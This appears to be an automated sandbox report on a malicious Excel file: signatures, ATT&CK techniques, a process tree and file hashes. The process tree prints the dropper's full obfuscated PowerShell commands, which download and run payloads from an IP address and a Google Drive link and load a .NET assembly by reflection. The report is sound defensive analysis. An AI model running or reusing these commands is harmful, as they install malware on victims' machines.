d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6

Analysis

max time kernel
101s
max time network
126s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
07/11/2024, 03:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
Size

1.1MB
MD5

9b8d94907c2db1b8ae9ebf84b2099c16
SHA1

d543e02897263288f2b2a65d7070757d99fed8ff
SHA256

d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6
SHA512

cc8d24cee7a41c7cc2ddab9cd5d7ae6b245dcd90fee8b5de1d4001dae83e7c43d3cbd474bc1c4f89fa9ec903d26de680630d8b064328f07b3a04cf827182a972
SSDEEP

24576:1yaZxvseowaDI9eqvBw2LyifZSScF1LelExbgwCcH0p1O4uGqdzkxTm:1T0DIRvBwCv0xF1L3MwCA4uIx

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	2540	mshta.exe
21	2540	mshta.exe
23	2428	POWErsHell.eXE
25	1512	powershell.exe
27	1512	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1512	powershell.exe
964	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2428	POWErsHell.eXE
2652	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	drive.google.com
25	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWErsHell.eXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWErsHell.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
840	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2428	POWErsHell.eXE
2652	powershell.exe
2428	POWErsHell.eXE
2428	POWErsHell.eXE
964	powershell.exe
1512	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2428	POWErsHell.eXE
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	964	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
840	EXCEL.EXE
840	EXCEL.EXE
840	EXCEL.EXE
840	EXCEL.EXE
840	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 2428	2540	mshta.exe	31
PID 2540 wrote to memory of 2428	2540	mshta.exe	31
PID 2540 wrote to memory of 2428	2540	mshta.exe	31
PID 2540 wrote to memory of 2428	2540	mshta.exe	31
PID 2428 wrote to memory of 2652	2428	POWErsHell.eXE	33
PID 2428 wrote to memory of 2652	2428	POWErsHell.eXE	33
PID 2428 wrote to memory of 2652	2428	POWErsHell.eXE	33
PID 2428 wrote to memory of 2652	2428	POWErsHell.eXE	33
PID 2428 wrote to memory of 1636	2428	POWErsHell.eXE	34
PID 2428 wrote to memory of 1636	2428	POWErsHell.eXE	34
PID 2428 wrote to memory of 1636	2428	POWErsHell.eXE	34
PID 2428 wrote to memory of 1636	2428	POWErsHell.eXE	34
PID 1636 wrote to memory of 1932	1636	csc.exe	35
PID 1636 wrote to memory of 1932	1636	csc.exe	35
PID 1636 wrote to memory of 1932	1636	csc.exe	35
PID 1636 wrote to memory of 1932	1636	csc.exe	35
PID 2428 wrote to memory of 1724	2428	POWErsHell.eXE	36
PID 2428 wrote to memory of 1724	2428	POWErsHell.eXE	36
PID 2428 wrote to memory of 1724	2428	POWErsHell.eXE	36
PID 2428 wrote to memory of 1724	2428	POWErsHell.eXE	36
PID 1724 wrote to memory of 964	1724	WScript.exe	37
PID 1724 wrote to memory of 964	1724	WScript.exe	37
PID 1724 wrote to memory of 964	1724	WScript.exe	37
PID 1724 wrote to memory of 964	1724	WScript.exe	37
PID 964 wrote to memory of 1512	964	powershell.exe	39
PID 964 wrote to memory of 1512	964	powershell.exe	39
PID 964 wrote to memory of 1512	964	powershell.exe	39
PID 964 wrote to memory of 1512	964	powershell.exe	39

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:840

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE
  "C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'JEE5QjJqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRwY1VPTmRSLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdjWFpDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRNVXVCLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNdGZMc256LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEliQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImRkUGJnTElwWEIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEthSXZOWFFvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBOUIyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNDYvMjE3L3NlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3YXlzLnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ2l2ZW5tZWdyZWF0dy52YnMiLDAsMCk7U1RBcnQtU2xFZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3LnZicyI='+[ChAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2428
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1932
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzaG9NRVsyMV0rJFBzaG9NZVszNF0rJ3gnKSggKCc3eicrJ3hpbWFnZVVybCA9IEs5a2h0dHBzOi8vZHJpdicrJ2UuZ29vZ2xlLmNvbS91Yz9leHBvcnQnKyc9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEs5azs3eicrJ3h3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuJysnV2ViQ2xpZW50Ozd6eGknKydtYWdlQnl0JysnZXMgPSA3eicrJ3h3ZWJDbGllbnQuRG93bmxvYWREYXRhKDd6eGltYWdlVXJsKTs3enhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg3enhpbWFnZUJ5dGVzKTs3enhzdGFydEZsYWcgPSBLOWs8PEJBU0U2NF9TVEFSVD4+SzlrOzd6eGUnKyduZEZsYWcgPSBLOWs8PEJBU0U2NF9FTkQ+Pks5azs3enhzdGFydEluZGV4ID0gN3p4aW1hZ2VUZXh0LkluZGV4T2YoN3p4c3RhcnRGbGFnKTsnKyc3enhlbmRJbmRleCA9IDd6eGltYWdlVGV4dC5JbmRleE9mKDd6JysneGVuZEZsYWcpOzd6eHN0YXJ0SW5kZXggLWcnKydlIDAgLWFuZCA3JysnenhlbmRJbicrJ2RleCAtZ3QgN3onKyd4c3RhcnRJbmQnKydleDs3enhzdGFydEluZGV4ICs9IDd6eHN0YXJ0RmxhZy5MZW5ndGg7N3p4YmFzZTYnKyc0TGVuZ3RoID0gN3p4ZW5kJysnSW5kZXggLSA3enhzdGFydEluZCcrJ2UnKyd4Ozd6eGJhc2U2NENvbW1hbmQnKycgPSA3enhpbWFnZVQnKydleHQuU3Vic3RyaW5nKDd6eHN0YXJ0SW5kZXgsJysnIDd6eGJhc2U2NExlbmd0aCk7N3p4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN3p4YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGFDeCBGb3JFYWNoLU9iamVjdCB7IDd6eF8gfSknKydbLTEuLi0oN3p4YmFzZTY0Q29tbWFuZC5MZScrJ25ndGgpXTs3enhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDd6JysneGJhc2U2NFJldmVyc2VkKTs3enhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdCcrJ2lvbi5Bc3NlbWJseV06OicrJ0xvYWQoN3p4Y29tbWFuZEJ5dGVzKTs3enh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKEs5a1ZBSUs5ayk7N3p4dmFpTWV0aG9kLkludm9rZSg3enhudWxsLCBAKEs5a3R4dC5SUklNTUEnKydDLzcxMi82NDEuMzkxLjMuMjkxLy86cCcrJ3R0aEs5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrZGVzYXRpdmFkJysnb0s5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrYXNwbmV0X2NvbXBpbGVySzlrLCBLOWtkZXNhdGl2YWRvSzlrLCAnKydLOWtkJysnZXNhdGl2YWRvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzknKydrZGVzYScrJ3RpdmFkb0s5ayxLOWtkZXNhdGl2YWQnKydvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzlrZGUnKydzYXRpdmFkb0s5ayxLOWsxSzlrLEs5a2Rlc2F0aXZhZG9LOWspKTsnKS5SRXBsYUNFKCdhQ3gnLFtTVFJJbmddW0NIQVJdMTI0KS5SRXBsYUNFKChbQ0hBUl03NStbQ0hBUl01NytbQ0hBUl0xMDcpLFtTVFJJbmddW0NIQVJdMzkpLlJFcGxhQ0UoJzd6eCcsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
1KB

MD5
3e652ebfb9e701d6bd515f81d762331d

SHA1
46cc56c7a8d342f3fa14d7ceb19b4d48a699072e

SHA256
9d1b4927244aa7e9cf87639c48fa5a5bea959765680f195ca6253f62792e122d

SHA512
a2c4859b5c6363968478851fdb4e8098535c0bcc0f6fab48252536898141d72fdf1ec4b14a1f75817bee457eaac662ce6f95be785c0745763e4f82998614a8e9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
66b8e52f6d682ffbbb3baca244831960

SHA1
a6f6336d059949a32273a491a8b99832804770a3

SHA256
8fb788a5d531dc1bface8c316635c407b96b881a1dc65812d63e13095d784aad

SHA512
af041ecbc4385b6df1b0618e7b3a22de0e51c94907c053d84cd80518d18e9b8b4009f4771581e7ddf14891569054d9173a0a39fd3cc2b64a244513915fcbf92f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
1KB

MD5
cc0416733fe9f2211840ff355ceb5fad

SHA1
17b801484ecda2a3badb814e02d56b11ca768d81

SHA256
b0cd53b7f50a9d79caa2e78864aab2bc68d115cb35829a2b451ca653a7e26481

SHA512
30db6ef8a485076dca3f76848bd4e0d55e480c7b868fb03f44cd95ab381d83f36ab228acd6a97d71a5d4d0c1d9bced9e9ff9e1971314051c3f8316108bae4943

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

Filesize
471B

MD5
8955bb560abf515e94ca68dd87ef93b4

SHA1
edfe758796fd694f425d843c9d68689485743a4d

SHA256
e8da732b763426bd055a381d3647dc506f3c5d14fe0bf6e0b174c2365306c3c4

SHA512
ce74e7a1fd0b5baa6781d54dca087e81b8f9f68582ca935a40fd235510ed15ce8351561d8bda74f584a01225e63e5bcf99dd16953c8efb03064435aad7153173

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
434B

MD5
5f92c2caa4bcd2061af1d8656ec4ad7d

SHA1
72ec7878aac542fe23da4b1926c7298adf2ebd78

SHA256
f822c5c53c6bb3c31c7106b420ff2f717e3c4b25d5bb181d2e17ae8849886210

SHA512
181aa54110c84fb0f6a69d0af9df437ddbc2823a729f25b5bbf0016d6d834d6587acb3c5c70679c6dd091ac321389593fa0b944842c8f453306130e9c98b6867

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e4f18e168d45a34999bbc72a47fb4c72

SHA1
32540425d1e4b040dcac255e27bba392a154528b

SHA256
671efce174efe9bbf2b581c14524762d36af43ce1824fae84ab6afb0970325aa

SHA512
12ecc1fb0619a0d499c7c9399dca467298adcbeee1fa0adb8291bd4e12af7fe3cb1df7c9b90b35655d37753f7ac62bac540f454cc4e0886f70c0ae5bef01d4fc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
11beaa8c508c0d9b13fddeca4daaf6ab

SHA1
67a150ad5039dfc5145e7a20bf3346ad2be71ece

SHA256
6f765e3805d1cd0e5eb35b42458694c6c1b6cca6ed2e31f04f25bed6655a3d42

SHA512
319de834b06e57064cfe7dbea1de4c9c8df578eca45c328f25e4891f6a81fc0597dd220c920cdca6ec6ea08d9313a4def5fe6972f0aa854cfdf20ccb8e55461f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
3006b04e64f5a2a1f7d8d4d5fe9e165f

SHA1
48ee99c8e4eac0950c7e284aa73c03290bfdd7da

SHA256
c9c77de0dd1b3a25d26685945d5cfe4bcda2002ee828d42c79e041fc10bd39f7

SHA512
24a21f4ac32089a9c442f2bbbab7c75c0cb7f6bf58932421ef46c8b523195e536520fa615795f0f2ce48b111906135f106d4d7043ba9c61711e14dd24a8fac45

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
432B

MD5
8926de42b009c839ba6fee717e05224c

SHA1
96e282be739b499206c7e59308ca5db916a53f58

SHA256
68762245efc87ee716b7dfa8a54cedc243894300084c2096a391f9bf9d1f0891

SHA512
1bfdc869fb466b5b9cd4b4b8342d68eefac50e203e987f3e13b7a87ea685d21e276afeca46d37fdb31eebed2e5288bca6cde47107f63ed772db099d1b40a5f1a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

Filesize
426B

MD5
9c7b1b244d1c1f3b0bbccc1bddc3886e

SHA1
dea53c150d7e95d3f1d8302ba2da717067c162e9

SHA256
8fecf362484ca2c904ac0f1020c92eb1d8d1fa0789865b9d213aac657df3641c

SHA512
68c1f513267379d91b965671d95f9d27e615bc23f1aef13965c2a24bda8d651e9906113572a5b741c6132bc139efd95b74bb246f24db598f046044abd7efef19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\wecreatdbestthingswithgreatthingsentiretimeeverywheregoodhappy[1].hta

Filesize
8KB

MD5
552093c811bbc7be144296b66144b9a2

SHA1
67377ed35b84dd08b6bd1612d20379cc31482e18

SHA256
92251c4a9e0172e074c732ed052251b68d15843b00b466dc233fcb211ec02140

SHA512
0bb1ccee11b257097ca5e828fcdb02ea6b4283975bfa17bc6a86b579d020177a33c30b7f9fff27157caa03b1ffc52e1929633a322180fafaac680f252dae979a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab396B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
